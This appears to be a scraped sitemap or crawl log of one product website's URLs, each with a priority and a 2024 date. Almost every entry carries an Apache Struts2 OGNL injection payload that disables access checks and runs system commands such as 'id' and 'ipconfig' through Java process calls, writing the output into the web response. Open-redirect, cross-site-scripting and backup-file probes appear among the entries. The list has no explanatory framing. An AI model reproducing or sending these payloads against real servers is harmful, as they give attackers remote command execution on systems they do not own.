http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?=%3ca848b1%20x%3d928138676%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?=%3c092257%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=tzlbu 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=tzlbu? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?=%3cb50a87%20x%3d954211641%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27%5b%5d_002_product.html%3f=%3c9a45b5+x%3d913997357%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?=%3ca9874a%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?=%3c854845%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27%5b%5d_002_product.html%3f=%3c854845%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_arc 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_arc? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_bac 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_bac? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_backup 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_backup? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?=%3c695174%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f=%3c695174%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_bak 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_bak? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_bck 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_bck? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_copy 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_copy? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_old 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_old? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_orig 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_orig? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_sav 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_sav? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_save 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_save? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_saved 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_saved? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_swp 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_swp? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_temp 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_temp? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_test 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_test? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_tmp 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html_tmp? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f%3f? 0.5 2024-04-30 